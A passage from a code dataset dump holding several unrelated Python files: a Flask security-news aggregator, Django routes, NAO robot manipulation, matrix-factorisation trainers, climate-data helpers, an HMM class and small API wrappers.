Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///E:/PyProject/Spider/info.db'\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN']=True\r\nbootstrap = Bootstrap(app)\r\ndb=SQLAlchemy(app)\r\n\r\nclass Info(db.Model):\r\n title=db.Column(db.String(255),nullable=False)\r\n content=db.Column(db.String(255),nullable=True)\r\n time=db.Column(db.String(255),nullable=False)\r\n source=db.Column(db.String(100),nullable=False)\r\n href=db.Column(db.String(255),nullable=False,primary_key=True)\r\n\r\n\r\ndef data_treat(info):\r\n data = [\r\n {\r\n # \"title\": 1,\r\n # \"title\": \"{1}\".format(l.href,l.title),\r\n # \"content\": l.content,\r\n \"title\": \"{1}
{2}\".format(l.href, l.title,\r\n l.content),\r\n \"date\": l.time[:-3]\r\n }\r\n for l in info\r\n ]\r\n data = jsonify(data)\r\n return data\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('base.html')\r\n\r\n@app.route('/data/')\r\ndef data(type):\r\n #message_count = Ipvm.query(SQLAlchemy.func.count(Ipvm.href)).scalar()\r\n if type=='ipvm':\r\n info = Info.query.filter_by(source='ipvm')\r\n elif type=='anquanke':\r\n info=Info.query.filter_by(source='anquanke')\r\n data=data_treat(info)\r\n return data\r\n\r\n@app.route('/ipvmsearch')\r\ndef search():\r\n keyword = request.args.get('keyword')\r\n result = Info.query.filter(or_(Info.title.contains(keyword),Info.content.contains(keyword)),Info.source==\"ipvm\").order_by(Info.time.desc()).all()\r\n if result:\r\n return render_template('ipvmsearch.html', result=result)\r\n else:\r\n return render_template('notfind.html')\r\n\r\n@app.route('/ipvm/')\r\ndef ipvm():\r\n return render_template('ipvm.html')\r\n\r\n@app.route('/anquanke/')\r\ndef anquanke():\r\n return render_template('anquanke.html')\r\n\r\n@app.route('/youshang/')\r\ndef youshang():\r\n hik=Info.query.filter_by(source='hik')\r\n yushi=Info.query.filter_by(source='uniview')\r\n return render_template('youshang.html',hik=hik,yushi=yushi)\r\n\r\n@app.route('/360cert/')\r\ndef cert():\r\n date=Info.query.filter(Info.source==\"360cert\")\r\n return render_template(\"360cert.html\",date=date)\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"securityinfo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113759374","text":"from django.urls import path, include\nfrom .views import *\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('', index, name='index'),\n path('category//', product_in_category, name='product_in_category'),\n path('tag//', product_tagged, name='product_tagged'),\n path('products//', product_detail, name='product_detail'),\n path('products//like',ProductLikeToggle.as_view(), name='product_like-toggle'),\n \n path('comments//',comment_delete, name='comment_delete'),\n path('comments//',comment_update, name='comment_update'),\n \n path('mymap/', mymap, name='mymap'),\n\n path('api/', ApiRoot.as_view(), name=ApiRoot.name),\n path('api/product-categories/', ProductCategoryList.as_view(), name=ProductCategoryList.name),\n path('api/product-categories//', ProductCategoryDetail.as_view(), name=ProductCategoryDetail.name),\n path('api/products/', ProductList.as_view(), name=ProductList.name),\n path('api/products//', ProductDetail.as_view(), name=ProductDetail.name),\n path('api/products//like', ProductLikeAPIToggle.as_view(), name=ProductLikeAPIToggle.name),\n path('api/comments/', CommentList.as_view(),name=CommentList.name),\n path('api/comments//', CommentDetail.as_view(),name=CommentDetail.name),\n path('api/replies/', ReplyList.as_view(), name=ReplyList.name),\n path('api/replies//', ReplyDetail.as_view(), name=ReplyDetail.name),\n \n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)\n","sub_path":"myside/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281815364","text":"import time\nimport math\nfrom naoqi 
import ALProxy, ALBroker, ALModule\nimport numpy as np\nimport cv2\nimport NaoImageProcessing, LinesAndPlanes\nimport vision_definitions\nimport ConfigParser, argparse\nimport imageProcessing\n\nclass ManipulationClass():\n def __init__(self, motionproxy, Nao_object, grab_number, grabPoint, memory, postureproxy, grab_direction):\n self.motionproxy = motionproxy\n self.grab_number = grab_number\n self.grabPoint = grabPoint\n self.memory = memory\n self.grab_direction = grab_direction\n self.Nao_object = Nao_object\n self.postureproxy = postureproxy\n\n def objectAction(self, action):\n \"\"\"\n Called from object_manipulation function, it runs object grabbing with NAO.\n \"\"\"\n rotControl = True\n if rotControl:\n mask = 15\n else:\n mask = 7\n\n xOffset_app = 0.0\n xOffset_lift = 0.0\n xOffset_grab = 0.0\n sideOffset_app = 0.0\n sideOffset_grab = 0.0\n sideOffset_lift = 0.0\n heightOffset_app = 0.0\n heightOffset_grab = 0.0\n heightOffset_lift = 0.0\n rotation = 1\n\n safeUp = [0.1, self.grab_number * 0.20, 0.41, 0, 0, 0]\n beh_pose = [0.05, self.grab_number * 0.05, 0.41, 0, 0, 0]\n\n hand = str(self.grab_direction) + 'Hand'\n arm = str(self.grab_direction) + 'Arm'\n\n chainName=arm\n handName=hand\n self.motionproxy.setStiffnesses(arm,1.0)\n #motionProxy.setStiffnesses(\"RArm\",0.0)\n #self.motionproxy.setAngles(hand,1.0,0.4)\n\n if self.Nao_object == 'Cup':\n sideOffset_app= self.grab_number * 0.04\n rotation= (-1) * self.grab_number * 1.57\n heightOffset_lift = 0.05\n xOffset_lift =0.0\n xOffset_grab = 0.0\n heightOffset_grab = 0.0\n heightOffset_app = 0.0\n else:\n if self.Nao_object == 'Frog':\n heightOffset_app = 0.12\n heightOffset_lift = 0.12\n heightOffset_grab = 0.0\n rotation = 0.0\n xOffset_grab = 0.0\n else:\n if self.Nao_object == 'Plane':\n heightOffset_app = 0.12\n heightOffset_lift = 0.12\n heightOffset_grab = 0.0\n rotation = 0.0\n xOffset_grab = 0.02\n\n\n approachPoint = [self.grabPoint[0] + xOffset_app, self.grabPoint[1] + sideOffset_app, self.grabPoint[2]+heightOffset_app + 0.02, rotation, 0, 0]\n grabPoint = [self.grabPoint[0] + xOffset_grab, self.grabPoint[1] + sideOffset_grab, self.grabPoint[2] + heightOffset_grab - 0.01, rotation, 0, 0]\n liftPoint = [self.grabPoint[0] + xOffset_lift, self.grabPoint[1] + sideOffset_lift, self.grabPoint[2] + heightOffset_lift, rotation, 0, 0]\n\n if action == \"Grab\":\n self.motionproxy.setAngles(hand,1.0,0.4)\n listOfPointsBeforeGrasp = [safeUp, approachPoint, grabPoint]\n listOfTimesBeforeGrasp = [2, 4, 5]\n\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n\n self.motionproxy.wbEnableEffectorControl(chainName, True)\n self.motionproxy.positionInterpolation(chainName, 2, listOfPointsBeforeGrasp,mask,listOfTimesBeforeGrasp,True)\n self.motionproxy.setAngles(handName, 0.0, 0.3)\n time.sleep(1.0)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n self.motionproxy.positionInterpolation(chainName, 2, liftPoint, mask, 1, True)\n time.sleep(0.5)\n\n #self.motionproxy.positionInterpolation(chainName, 2, beh_pose, mask, 2, True)\n self.motionproxy.positionInterpolation(\"Torso\", 2, beh_pose, mask, 1, True)\n return 1\n\n elif action == \"putBack\":\n grabPoint2 = [self.grabPoint[0] + xOffset_grab + 0.1, self.grabPoint[1] + sideOffset_grab, self.grabPoint[2] + heightOffset_grab, rotation, 0, 0]\n grabPoint3 = [self.grabPoint[0] + xOffset_grab + 0.05, self.grabPoint[1] + sideOffset_grab + self.grab_number * 0.15, self.grabPoint[2] + 0.10, rotation, 0, 0]\n self.motionproxy.setAngles(handName, 
0.0, 0.3)\n #self.motionproxy.positionInterpolation(chainName, 2, grabPoint, mask, 2, True)\n self.motionproxy.positionInterpolation(chainName, 2, grabPoint2, mask, 2, True)\n time.sleep(0.5)\n self.motionproxy.setAngles(handName, 1.0, 0.5)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n time.sleep(1)\n self.motionproxy.positionInterpolation(chainName, 2, grabPoint3, mask, 2, True)\n #self.motionproxy.positionInterpolation(chainName, 2, approachPoint, mask, 2, True)\n #self.motionproxy.positionInterpolation(chainName, 2, safeUp, mask, 1, True)\n time.sleep(1)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n safeUp2=[0.05, self.grab_number * 0.05, 0.35, 0, 0, 0]\n #self.motionproxy.positionInterpolation(chainName, 2, safeUp2, mask, 2, True)\n self.motionproxy.positionInterpolations([chainName, \"Torso\"],2,[[safeUp2],[[0.05,0,0.32,0,0,0]]],[7, 7],[[2],[2]],True)\n #self.motionproxy.positionInterpolations([chainName, \"Torso\"], 2, [[safeUp], [[0.15, 0, 0.34, 0, 0, 0]]],\n # [15, 15], [[2], [2]], True)\n\n\n #self.motionproxy.positionInterpolation(\"Torso\", 2, beh_pose, mask, 1, True)\n\n #self.postureproxy.goToPosture(\"StandInit\", 0.8)\n self.motionproxy.wbEnableEffectorControl(chainName, False)\n return 1\n else:\n return None","sub_path":"objectManipulation.py","file_name":"objectManipulation.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515091386","text":"from tqdm import tqdm\nimport numpy as np\n\nclass Trainer(object):\n def __init__(self, model, args, X, L_star = None):\n self.model = model\n self.args = args\n self.L_star = None\n if L_star is not None:\n self.L_star = L_star\n self.error_ls = []\n self.X = X\n if args.model_name == 'subgradient':\n self.train = self.train_subgradient\n if args.model_name == 'A_IRLS_combined':\n self.train = self.train_A_ILRS_combined\n if args.model_name == 'A_IRLS':\n self.train = self.train_A_ILRS\n def train_subgradient(self,args,U,V):\n U0,V0 = U,V\n max_iter = args.max_iter_subG\n lr = args.lr\n for _ in tqdm(range(max_iter)):\n U0 += self.model(U0,V0,self.X, target_grad='u')*lr\n V0 += self.model(U0,V0,self.X, target_grad='v')*lr\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n def train_A_ILRS_combined(self,args,U,V):\n U0,V0 = U,V\n max_iter = args.max_iter_A_ILRS_combined\n for _ in tqdm(range(max_iter)):\n U0 = self.model(U0,V0,self.X, target_grad='u')\n V0 = self.model(U0,V0,self.X, target_grad='v')\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n def train_A_ILRS(self,args,U,V):\n U0,V0 = U,V\n d,n = self.X.shape\n max_iter = args.max_iter_A_ILRS\n for _ in tqdm(range(max_iter)):\n for k in range(n):\n V0[k,:] = self.model(U0,V0,self.X[:,k],target_grad='v')\n for k in range(d):\n U0[k,:] = self.model(U0,V0,self.X[k,:],target_grad='u')\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n\n\n\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134905789","text":"# General Helper Functions\n\nimport cf_units as unit\nimport cftime\nimport iris\nimport iris.coord_categorisation\nfrom iris.analysis.cartography import 
unrotate_pole\nfrom iris.coords import AuxCoord\nfrom iris.experimental.equalise_cubes import equalise_attributes\nfrom iris.util import unify_time_units\nimport numpy as np\nfrom numpy import meshgrid\nimport numpy.ma as ma\nfrom scipy.interpolate import griddata\nfrom statsmodels.tsa.seasonal import STL\nimport pandas as pd\nimport dask\nimport dask.array as da\nimport dask.delayed as delayed\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\ndef apply_common_time_coordinates(cube):\n u = unit.Unit('days since 1979-01-01 00:00:00', calendar='gregorian')\n \n if cube.coord('time').units.calendar == '365_day': # This is only needed for RACMO(ERA5)\n \n dates_365 = cube.coord('time').units.num2date(cube.coord('time').points)\n #iris.unit.num2date(time_value, unit, calendar) [For the given units and the given values, convert to datetimes]\n dates_gregorian = []\n\n for date in dates_365:\n year = date.year\n month = date.month\n day = date.day\n hour = date.hour\n dates_gregorian.append(cftime.DatetimeGregorian(year, month, day, hour, 0, 0, 0))\n \n # converts each 365 datetime object to a gregorian datetime object\n \n num_gregorian = unit.date2num(dates_gregorian, 'days since 1979-01-01 00:00:00', calendar='gregorian')\n \n # returns values for each datetime given units of gregorian and days since 1979\n \n cube.coord('time').points = num_gregorian # updates cubes time point values\n cube.coord('time').units = unit.Unit(u,calendar = 'gregorian') # updates cubes time units\n\n converted_points = cube.coord('time').units.convert(cube.coord('time').points,u,unit.FLOAT32)\n cube.coord('time').points = converted_points\n \n cube.coord('time').units = u\n cube.coord('time').var_name = 'time'\n cube.coord('time').long_name = 'time'\n cube.coord('time').standard_name = 'time'\n\n cube.coord('time').bounds = None\n cube.coord('time').guess_bounds()\n converted_bounds = cube.coord('time').units.convert(cube.coord('time').bounds,u,unit.FLOAT32)\n cube.coord('time').bounds = converted_bounds\n \ndef add_doy_month_year(cube):\n iris.coord_categorisation.add_day_of_year(cube, 'time', name='day_of_year') \n iris.coord_categorisation.add_month(cube, 'time', name='month') \n iris.coord_categorisation.add_year(cube, 'time', name='year') \n\ndef add_2d_latlon_aux_coords(cube):\n rotated_grid_latitude = cube.coord('grid_latitude').points\n rotated_grid_longitude = cube.coord('grid_longitude').points\n lons,lats = meshgrid(rotated_grid_longitude, rotated_grid_latitude)\n cs = cube.coord_system()\n lons,lats = unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)\n #lons,lats = rotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)\n \n grid_lat_dim = cube.coord_dims('grid_latitude')[0]\n grid_lon_dim = cube.coord_dims('grid_longitude')[0]\n \n cube.add_aux_coord(AuxCoord(points=lats, standard_name='latitude', units='degrees'),(grid_lat_dim,grid_lon_dim))\n cube.add_aux_coord(AuxCoord(points=lons, standard_name='longitude', units='degrees'),(grid_lat_dim,grid_lon_dim))\n\ndef examine_postprocessed_data(filename,path):\n\n cube = iris.load(path+filename)[0]\n time = cube.coord('time')\n \n print(color.BOLD +color.PURPLE + filename + color.END)\n \n print(cube)\n \n print(color.BOLD + 'Data:' + color.END)\n print('Units =',cube.units)\n print('Mean =',cube.data.mean())\n 
print('Sum =',cube.data.sum())\n \n print(color.BOLD + 'Time:' + color.END)\n print('Start Date =',time.units.num2date(time.points[:1]))\n print('End Date =',time.units.num2date(time.points[-1:]))\n print('Units =',time.units)\n print('Frequency =',time.points[1]-time.points[0])\n \ndef regriding_impact(filename,paths,mask):\n broadcasted_mask = np.broadcast_to(mask[np.newaxis,:,:],[12,392,504])\n \n for path in paths:\n cube = iris.load(path+filename)[0]\n cube.data = cube.data*12250**2/10**12\n cube.data = ma.masked_where(broadcasted_mask==False, cube.data) # masking to land only\n print(color.BOLD +color.PURPLE + path+filename + color.END) \n print('Mean =',cube.data.mean())\n print('Sum =',cube.data.sum())\n\ndef regrid(cube,grid_cube,method):\n \n if isinstance(cube.data, ma.MaskedArray):\n #Replacing masked values with zero value\n cube.data = cube.data.filled(0)\n \n #rotating coordinates to equator so distances are approximately euclidean \n lons,lats = cube.coord('longitude').points,cube.coord('latitude').points\n rot_lons,rot_lats = unrotate_pole(lons,lats, 180, 0) \n \n #sample points:\n points = np.array(list(zip(rot_lats.ravel(),rot_lons.ravel())))\n values = cube.data.ravel()\n \n #new grid points:\n grid_lons, grid_lats = grid_cube.coord('longitude').points,grid_cube.coord('latitude').points\n rot_grid_lons,rot_grid_lats = unrotate_pole(grid_lons,grid_lats, 180, 0) \n \n #interpolating:\n regridded_data = griddata(points, values, (rot_grid_lats, rot_grid_lons), method=method, fill_value = 0)\n \n cube_regridded = iris.cube.Cube(\n regridded_data,\n long_name='cube_regridded',\n aux_coords_and_dims=[(grid_cube.coord('latitude'),grid_cube.coord_dims('latitude')),(grid_cube.coord('longitude'),grid_cube.coord_dims('longitude'))]\n )\n \n return(cube_regridded[:])\n\ndef remove_auxcoords(cube):\n for i in cube.aux_coords:\n cube.remove_coord(i)\n\ndef stl_decomposition(timeseries,start_date,frequency):\n data = timeseries[:]\n ds = pd.Series(data, index=pd.date_range(start_date, periods=len(data), freq=frequency), name = 'Decomposition')\n stl = STL(ds, seasonal=13)\n #stl = STL(ds, seasonal=13,robust=True)\n res = stl.fit()\n \n return ([res.trend,res.seasonal,res.resid]) \n\ndef concatenate_cubes(cubelist):\n equalise_attributes(cubelist)\n unify_time_units(cubelist)\n return cubelist.concatenate_cube()\n\ndef multi_apply_along_axis(func1d, axis, arrs, *args, **kwargs):\n \n #arrs = np.copy(arrs)\n \"\"\"\n Given a function `func1d(A, B, C, ..., *args, **kwargs)` that acts on \n multiple one dimensional arrays, apply that function to the N-dimensional\n arrays listed by `arrs` along axis `axis`\n \n If `arrs` are one dimensional this is equivalent to::\n \n func1d(*arrs, *args, **kwargs)\n \n If there is only one array in `arrs` this is equivalent to::\n \n numpy.apply_along_axis(func1d, axis, arrs[0], *args, **kwargs)\n \n All arrays in `arrs` must have compatible dimensions to be able to run\n `numpy.concatenate(arrs, axis)`\n \n Arguments:\n func1d: Function that operates on `len(arrs)` 1 dimensional arrays,\n with signature `f(*arrs, *args, **kwargs)`\n axis: Axis of all `arrs` to apply the function along\n arrs: Iterable of numpy arrays\n *args: Passed to func1d after array arguments\n **kwargs: Passed to func1d as keyword arguments\n \"\"\"\n # Concatenate the input arrays along the calculation axis to make one big\n # array that can be passed in to `apply_along_axis`\n carrs = np.concatenate(arrs, axis)\n \n # We'll need to split the concatenated arrays up before we 
apply `func1d`,\n # here's the offsets to split them back into the originals\n offsets=[]\n start=0\n for i in range(len(arrs)-1):\n start += arrs[i].shape[axis]\n offsets.append(start)\n \n # The helper closure splits up the concatenated array back into the components of `arrs`\n # and then runs `func1d` on them\n def helperfunc(a, *args, **kwargs):\n arrs = np.split(a, offsets)\n return func1d(*[*arrs, *args], **kwargs)\n \n # Run `apply_along_axis` along the concatenated array\n return np.apply_along_axis(helperfunc, axis, carrs, *args, **kwargs)\n\ndef RMSE(predictions, targets):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609448059","text":"# -*- coding: utf-8 -*-\n# -------------------------------------------------------------------------------\n# Name: \tmodel.py\n# Author: \tUtahka.A\n# Created: \tJul 11th, 2015\n# Last Date: \tJul 11th, 2015\n# Note:\n# -------------------------------------------------------------------------------\nimport pot\nclass model:\n \"\"\"\n status_arr =[\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}],\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}],\n ...,\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}]\n ]\n \"\"\"\n def __init__(self, status_arr, obs_series=[]):\n self.pot_arr = [] # list that stores the pots\n\n # create pot objects and store them in the list\n for status in status_arr:\n self.pot_arr.append(self.__make_pot(status))\n\n self.pot_num = len(self.pot_arr) # number of pots\n\n # chain the pot objects together in one direction\n for i in range(self.pot_num - 1):\n current_pot = self.pot_arr[i]\n next_pot = self.pot_arr[i+1]\n current_pot.link_pot(next_pot)\n\n if len(obs_series) == 0:\n self.__mk_obs_series()\n else:\n self.__obs_series = obs_series\n self.init_trellis()\n\n # (private) method that creates a pot object\n def __make_pot(self, status):\n return pot.pot(trans_prob=status[0], emiss_prob=status[1])\n\n # return the pot with the given number\n def get_pot(self, pot_num):\n return self.pot_arr[pot_num-1]\n\n # build the observation series\n def __mk_obs_series(self):\n pot = self.pot_arr[0]\n self.__obs_series = []\n while not pot == None:\n x = pot.draw()\n if x == \"next\":\n pot = pot.next_pot\n else:\n self.__obs_series.append(x)\n\n # return the observation series\n def get_obs_series(self):\n return self.__obs_series\n\n # method that creates the trellis\n def init_trellis(self):\n row_num = self.pot_num\n col_num = len(self.__obs_series)\n self.trellis = [[0.0 for i in range(col_num+1)] for i in range(row_num+1)]\n\n \"\"\"\n probability calculation method for the forward algorithm and the Viterbi algorithm\n row: state index of the node under consideration\n col: observation index of the node under consideration\n \"\"\"\n def __next_prob(self, row, col):\n trellis = self.trellis\n pot_arr = self.pot_arr\n obs_series = self.get_obs_series()\n hori = 0\n diag = 0\n\n \"\"\"\n hori: probability of a horizontal transition in the trellis\n diag: probability of a diagonal transition in the trellis\n \"\"\"\n if col < len(obs_series)-1:\n # emit without a state transition\n hori = pot_arr[row].trans_prob[\"self\"] * pot_arr[row].emiss_prob[obs_series[col+1]]\n if row < len(pot_arr)-1 and col < len(obs_series)-1:\n # emit with a state transition\n diag = pot_arr[row].trans_prob[\"next\"] * pot_arr[row+1].emiss_prob[obs_series[col+1]]\n return hori, diag\n\n def forward(self):\n self.init_trellis()\n\n obs_series = self.get_obs_series()\n trellis = self.trellis\n pot_arr = self.pot_arr\n\n # compute the trellis\n trellis[0][0] = pot_arr[0].emiss_prob[obs_series[0]] # top-left node\n for row in range(len(pot_arr)):\n for col in range(len(obs_series)):\n hori, diag = self.__next_prob(row, col)\n trellis[row][col+1] += trellis[row][col] * hori\n trellis[row+1][col+1] += trellis[row][col] * diag\n trellis[len(pot_arr)][len(obs_series)] = trellis[len(pot_arr)-1][len(obs_series)-1] * pot_arr[len(pot_arr)-1].trans_prob[\"next\"]\n\n # return the result of the forward algorithm\n return round(trellis[len(pot_arr)][len(obs_series)], 5)\n\n def viterbi(self):\n self.init_trellis()\n\n obs_series = self.get_obs_series()\n trellis = self.trellis\n pot_arr = self.pot_arr\n\n # compute the trellis\n trellis[0][0] = pot_arr[0].emiss_prob[obs_series[0]] # top-left node\n for row in range(len(pot_arr)):\n for col in range(len(obs_series)):\n hori, diag = self.__next_prob(row, col)\n if trellis[row][col+1] < trellis[row][col] * hori:\n trellis[row][col+1] = trellis[row][col] * hori\n if trellis[row+1][col+1] < trellis[row][col] * diag:\n trellis[row+1][col+1] = trellis[row][col] * diag\n trellis[len(pot_arr)][len(obs_series)] = trellis[len(pot_arr)-1][len(obs_series)-1] * pot_arr[len(pot_arr)-1].trans_prob[\"next\"]\n\n # return the result of the Viterbi algorithm\n return round(trellis[len(pot_arr)][len(obs_series)], 5)\n\n\nif __name__ == \"__main__\":\n status_arr = [\n [{\"next\": 0.4}, {\"red\": 0.2, \"blue\": 0.8}],\n [{\"next\": 0.3}, {\"red\": 0.5, \"blue\": 0.5}]\n ]\n\n mod = model(status_arr)\n print(mod.pot_arr[0].get_emiss_prob())\n print(mod.pot_arr[1].get_emiss_prob())\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129738630","text":"# -*- coding: utf-8 -*-\nimport unittest\n\n\ndef suma(num1, num2):\n return num1 + num2\n\n\nclass TestsSuma(unittest.TestCase):\n def test_upper(self):\n num1 = 5\n num2 = 3\n actual = suma(num1, num2)\n esperado = 8\n self.assertEqual(actual, esperado)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"PythonUnitTests/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287054401","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# 茅岗新村 志明 2019-01-28 7:27\n# Current computer login name: 志明\n# Project name:\n# IDE: PyCharm\n__author__ = '志明'\n__time__ = '2019-01-28 '\n\nimport tensorflow as tf\n\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('log/test-29.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('log/'))\n\ngraph = tf.get_default_graph()\nw1 = graph.get_tensor_by_name(\"w:0\")\nw2 = graph.get_tensor_by_name(\"b:0\")\nprint('Restored graph', w1, w2)\nprint(sess.run([w1, w2]))\n# feed_dict ={w1:13.0,w2:17.0}\n","sub_path":"TensorflowTest/还原图.py","file_name":"还原图.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260258579","text":"import Authentication\nimport requests\nimport SourceHandler\nimport SettingsHandler\n\nWSJ_URL = \"https://newsapi.org/v2/everything\"\nWATSON_URL = \"https://gateway.watsonplatform.net/natural-language-understanding/api/v1/analyze\"\n\nWSJ_PARAMETERS = {\n \"ApiKey\":Authentication.NewsOrgAPIKey,\n \"language\": \"en\",\n \"q\": \"politics\",\n \"pageSize\":SettingsHandler.MAX_API_RESULTS,\n \"sources\": ','.join(str(s) for s in SourceHandler.GetSources()),\n \"sortBy\":\"publishedAt\"\n}\n\ndef ParseCode(code):\n switcher = {\n 200: \"Everything is OK\",\n 301: 
\"Server is redirecting to a different endpoint\",\n 401: \"Server Does not think you are authenticated\",\n 400: \"Bad Request\",\n 403: \"Access to resource is forbidden\",\n 404: \"Resource Not Found\"\n }\n return switcher.get(code, 'Unhandled Exception')\n\ndef GetWatsonResponse(parameters):\n return requests.get(WATSON_URL,params=parameters, auth=Authentication.WATSON_AUTH)\n\ndef GetWSJResponse():\n return requests.get(WSJ_URL, params=WSJ_PARAMETERS)\n","sub_path":"APIHandler.py","file_name":"APIHandler.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508491944","text":"# -*- coding: utf-8 -*-\n\nfrom bson import json_util\nfrom flask import json\nfrom flask import request\n# api 模块添加\nfrom . import api\n\n# Python get Flower Model\nfrom app.api_1_0.api_functions.flowerPackage.get_vsim_hour_day_flower import getFlowers\n# sim_package_flower get Model\nfrom api_functions.flowerPackage.get_sim_package_flower import getSimPackageFlowerNextAPI\nfrom api_functions.flowerPackage.get_sim_package_flower import getSimPackageFlowerAPI\n\n\n@api.route('/get_FlowerQuery/', methods=['POST', 'GET'])\ndef get_FlowerQuery():\n \"\"\"\n :return:\n \"\"\"\n # paramKeyFromRequest = ['querySort','begintime','endtime','mcc','plmn','imsi','agg_group_key','TimezoneOffset']\n Dic_data = request.get_json()\n try:\n querySort = str(Dic_data['querySort'])\n timeList = Dic_data['timeList']\n queryMcc = str(Dic_data['mcc'])\n queryPlmn = str(Dic_data['plmn'])\n queryImsi = str(Dic_data['imsi'])\n aggGroupKey = Dic_data['agg_group_key']\n TimezoneOffset = int(Dic_data['TimezoneOffset'])\n except KeyError as keyerr:\n errInfo = (\"前端POST数据异常,KeyError:{}\".format(keyerr))\n DicData = []\n DicResults = {'info': {'err': True, 'errinfo': errInfo}, 'data': DicData}\n return json.dumps(DicResults, sort_keys=True, indent=4, default=json_util.default)\n\n return getFlowers(querySort=querySort,\n time_list=timeList,\n mcc=queryMcc,\n plmn=queryPlmn,\n imsi=queryImsi,\n flower_query_key=aggGroupKey,\n TimezoneOffset=TimezoneOffset)\n\n\n@api.route('/get_package_flower/', methods=['GET'])\ndef get_package_flower():\n \"\"\"\n :return:\n \"\"\"\n if request.method == 'GET':\n simPackageParam = {\n 'country': request.args.get('Country', 'ae', type=str),\n 'orgName': request.args.get('Org', 'gtbu', type=str),\n 'simType': request.args.get('SimType', '0', type=str),\n 'packageTypeName': request.args.get('PackageTypeName', '', type=str),\n 'avaStatus': request.args.get('AvaStatus', '', type=str),\n 'businessStatus': request.args.get('BusinessStatus', '', type=str),\n 'packageStatus': request.args.get('PackageStatus', '', type=str),\n 'slotStatus': request.args.get('SlotStatus', '', type=str),\n 'bamStatus': request.args.get('BamStatus', '', type=str)\n }\n\n return getSimPackageFlowerAPI(sim_package_param=simPackageParam)\n\n return False\n\n\n@api.route('/get_package_flower_next/', methods=['GET', 'POST'])\ndef get_package_flower_next():\n \"\"\"\n :return:\n \"\"\"\n if request.method == 'POST':\n Dic_data = request.get_json()\n try:\n package_date ={\n 'country': str(Dic_data['Country']),\n 'org': str(Dic_data['Org']),\n 'sim_type': str(Dic_data['SimType']),\n 'package_type_name': str(Dic_data['PackageTypeName']),\n 'next_update_time': str(Dic_data['NextUpdateTime']),\n 'ava_status': str(Dic_data['AvaStatus']),\n 'business_status': str(Dic_data['BusinessStatus']),\n 'package_status': str(Dic_data['PackageStatus']),\n 
'slot_status': str(Dic_data['SlotStatus']),\n 'bam_status': str(Dic_data['BamStatus']),\n 'add_group_key': Dic_data['addGroupKey']\n }\n flower_date = {\n 'query_type': Dic_data['queryType'],\n 'list_time': Dic_data['ListTime'],\n 'add_group_key': Dic_data['addGroupKey']\n }\n\n except KeyError as keyerr:\n errInfo = (\"前端POST数据异常,KeyError:{}\".format(keyerr))\n DicData = []\n DicResults = {'info': {'err': True, 'errinfo': errInfo}, 'data': DicData}\n\n return json.dumps(DicResults, sort_keys=True, indent=4, default=json_util.default)\n\n # errInfo = country+org+sim_type+package_type_name+next_update_time+'status'+ava_status+business_status+\\\n # package_status+slot_status+bam_status\n return getSimPackageFlowerNextAPI(package_data=package_date, flower_data=flower_date)\n\n return False\n","sub_path":"app/api_1_0/flower_statics.py","file_name":"flower_statics.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186903058","text":"import 